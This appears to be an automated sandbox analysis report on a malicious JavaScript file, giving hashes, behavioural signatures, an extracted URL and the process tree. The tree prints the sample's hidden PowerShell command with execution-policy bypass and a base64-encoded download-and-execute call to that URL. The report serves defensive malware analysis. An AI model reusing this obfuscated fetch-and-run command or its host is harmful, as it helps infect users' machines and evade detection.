Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
14/02/2024, 04:30
Static task
static1
Behavioral task
behavioral1
Sample
9ac18f194d835e48f4b1903999af4872.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
9ac18f194d835e48f4b1903999af4872.js
Resource
win10v2004-20231222-en
General
-
Target
9ac18f194d835e48f4b1903999af4872.js
-
Size
112KB
-
MD5
9ac18f194d835e48f4b1903999af4872
-
SHA1
1b01bcc53827bb23e59350448ea18590a342c855
-
SHA256
11bc8447ae0dca945dfccad9867d0f8450830e26e744e5f583cac07d1af8d56c
-
SHA512
c8c33864a5df156312098ea89d1e8541be0707fd0f75336d38d54531b47434c4ed09bddf0c7d1c3d397b2011f3b49736c1a2ffbb1cab5215fa388edbdf8a4d02
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXc:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGB
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 3008 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1660 wrote to memory of 2708 1660 wscript.exe 28 PID 1660 wrote to memory of 2708 1660 wscript.exe 28 PID 1660 wrote to memory of 2708 1660 wscript.exe 28 PID 2708 wrote to memory of 3008 2708 cmd.exe 30 PID 2708 wrote to memory of 3008 2708 cmd.exe 30 PID 2708 wrote to memory of 3008 2708 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9ac18f194d835e48f4b1903999af4872.js1⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-